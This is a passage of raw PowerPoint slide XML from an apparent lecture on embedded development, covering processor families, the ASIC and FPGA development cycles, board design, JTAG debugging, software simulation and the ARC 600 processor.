          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>RISC vs. non-RISC (RISC = Reduced Instruction Set Computer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Von Neumann vs. Harvard architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4-bit up to 64bit word length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Different flavors in each “processor family”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MANY processor types and vendors – 8051, 68k, ARC, ARM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Coldfire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, MIPS, PowerPC, SPARC, x86… very partial list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99876998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sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Development Environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205690502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ASIC development cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASIC - Application Specific Integrated Circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RTL design (register transfer level) – in high level language (VHDL / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Verilog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logic simulation - ~1,000,000-100,000,000 times slower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logic Synthesis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Placement and Routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Voltage and temperature testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486608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ASIC development cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1600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Design Spec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2362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RTL Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2362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Logic Simulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="3048000"/>
            <a:ext cx="2362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Layout – Placement and Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="3048000"/>
            <a:ext cx="2362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Design Rule Checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="4419600"/>
            <a:ext cx="2362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Photomasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to FAB (Tape-Out)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="54864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Fabrication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="62484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Silicon Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="20574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Left-Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2438400"/>
            <a:ext cx="457200" cy="228600"/>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eft-Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3505200"/>
            <a:ext cx="457200" cy="228600"/>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Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="2819400"/>
            <a:ext cx="304800" cy="228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Down Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="41148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Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="51816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Down Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="59436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U-Turn Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="304800" y="3733800"/>
            <a:ext cx="4114800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5900"/>
              <a:gd name="adj2" fmla="val 8959"/>
              <a:gd name="adj3" fmla="val 9702"/>
              <a:gd name="adj4" fmla="val 42737"/>
              <a:gd name="adj5" fmla="val 10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26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5486400" y="2819400"/>
            <a:ext cx="457200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C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32629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FPGA</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Field Programmable Gate Array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Purchased as a component from an FPGA vendor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logic can be programmed at vendor’s site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compare to ASIC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FPGA is somewhat slower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FPGA typically consumes more power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Per-piece cost is significantly higher for FPGA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can reach higher gate count in an ASIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>NRE is significantly lower for FPGA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49385299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FPGA as prototype</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In many cases an FPGA is used as a prototype or a development vehicle, while final product is an ASIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Combines the lower NRE of FPGA development with the benefits of ASIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extremely beneficial on high volumes, complex logic (especially when firmware is involved)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225669869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Debugging firmware on hardware</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It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>difficult!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once hardware is available, HW team does some basic post-silicon testing and hands off to FW team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hardware may still contain bugs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timing may be different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Space for logs or debug code is not always available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Debugger does not always have access to the device</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381687292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Board Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The board design is the stage of placing all parts on a single board, and connecting the busses and lines between them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASICs / FPGAs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>analog devices etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is typical to generate one or a few development boards, which produce more signals than are required on the final board, to allow debug ability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The production board is optimized for size / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wheight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113647811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JTAG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Joint Test Action Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4/5 pin interface designed to debug parts of an integrated circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows communication of an external test probe with the device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commonly used to debug processors with cross-debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10244" name="Picture 2" descr="Example of JTAG chain">
            <a:hlinkClick r:id="rId2" tooltip="Example of JTAG chai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62400"/>
            <a:ext cx="6229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22915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JTAG debugger</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dirty="0" smtClean="0"/>
              <a:t>A JTAG debugger allows the debugger to connect through JTAG to the processor and get visibility into the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Status and events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stop the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read specific processor counters (when stopped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read / write to memory and IO busses (when stopped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set hardware breakpoints / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>watchpoints</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that hardware resources are limited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software breakpoints are unlimited, by replacing the target instruction with a “halt” instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May not always be applicable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The debugger connects to the processor’s JTAG port through a parallel interface / USB / other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241228831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Software Simulation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Another option is to use a software simulator for the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The processor vendor typically supplies such a simulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still slower than the hardware (~x10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software simulation needs to be developed for the peripherals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not cycle-accurate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not always possible to simulate all hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does not validate hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2771493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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ARC 600</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ARC 600 is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>customizable  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>RISC processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The baseline processor is very simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Components can be added at design time: core registers, caches, interrupt lines, processor instructions (e.g. MUL) etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Data bus is 32 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For “Instruction Fetch” and “load/store” operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Additional I/O bus - 32 bit wide - for peripherals (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>auxiliary bus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>16 bit / 32 bit instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
